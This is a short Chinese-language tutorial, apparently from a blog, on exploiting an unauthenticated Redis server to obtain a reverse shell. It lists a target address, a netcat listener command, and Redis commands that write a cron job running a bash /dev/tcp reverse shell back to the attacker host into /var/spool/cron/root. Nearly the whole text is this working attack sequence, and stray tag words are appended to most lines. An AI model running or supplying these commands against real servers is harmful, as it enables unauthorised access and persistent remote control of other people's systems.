Redis未受權訪問反彈shellredis
目標主機:10.104.11.178shell
攻擊機:kalibash
攻擊步驟:tcp
1.與目標主機鏈接code
root@kali:~# /usr/redis/redis-cli -h 10.104.11.178
2.kali主機進行監聽blog
nc -l -v -p 9999
3.寫入反彈shell語句class
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/10.104.11.153/9999 0>&1\n\n" config set dir /var/spool/cron config set dbfilename root save
4.反彈shell鏈接成功cli